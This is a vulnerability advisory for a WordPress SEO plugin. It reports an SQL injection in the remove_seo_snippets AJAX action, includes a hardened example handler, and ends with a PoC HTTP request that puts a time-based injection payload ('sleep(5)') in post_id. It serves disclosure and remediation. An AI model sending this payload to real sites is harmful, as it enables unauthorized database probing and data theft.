Google SEO Pressor for Rich snippets [SQL Injection]
Description
Google SEO Pressor for Rich snippets registers the AJAX action remove_seo_snippets to give post authors a convenient way to remove all snippets from a post. This action in turn calls remove_snippets(), which performs neither a capability check nor input sanitization. The vulnerable parameter is $_POST['post_id'].
This is a privileged action, so it requires a registered user; no specific capability is required, though.
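For comparison, here is how a handler for such an action should be written. This is an added example, not the plugin's own code; the hook name, nonce action and meta key are assumptions. It adds the three controls the description says are missing: a nonce check, a per-post capability check, and strict typing of post_id before it reaches any query.

```php
<?php
// Added example, not the plugin's code: a hardened AJAX handler for a
// "remove snippets" action. Hook name, nonce action and meta key are assumptions.

add_action( 'wp_ajax_remove_seo_snippets', 'hardened_remove_snippets' );

function hardened_remove_snippets() {
    // 1. CSRF protection: the request must carry a nonce issued to this user.
    check_ajax_referer( 'remove_seo_snippets_nonce', 'nonce' );

    // 2. Input sanitization: coerce post_id to a non-negative integer, so a
    //    payload such as "1 and sleep(5)" collapses to the integer 1.
    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
    if ( 0 === $post_id || null === get_post( $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Invalid post id' ), 400 );
    }

    // 3. Capability check: being logged in is not enough; the caller must
    //    be allowed to edit this particular post.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 4. Use the WordPress meta API, which prepares its own queries,
    //    instead of interpolating $post_id into SQL. Meta key is an assumption.
    $removed = delete_post_meta( $post_id, '_seo_snippets' );

    // If raw SQL were unavoidable, the value must go through $wpdb->prepare():
    // global $wpdb;
    // $wpdb->query( $wpdb->prepare(
    //     "DELETE FROM {$wpdb->postmeta} WHERE post_id = %d AND meta_key = %s",
    //     $post_id, '_seo_snippets'
    // ) );

    wp_send_json_success( array( 'removed' => (bool) $removed ) );
}
```

The matching JavaScript must send the nonce (for example via wp_localize_script and wp_create_nonce('remove_seo_snippets_nonce')) in the nonce field, or every request will be rejected at step 1.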
PoC
POST /wp-admin/admin-ajax.php HTTP/1.1
Cookie: [COOKIES]

action=remove_seo_snippets&post_id=1 and sleep(5)
INFO
- Date: 25 April 2016
- Reported by: Pan Vag
- Vendor: www.smackcoders.com
- Plugin: Google SEO Pressor for Rich snippets
- Version: 1.2.6
- WordPress: 4.5
- DWF ID: DWF-2016-87026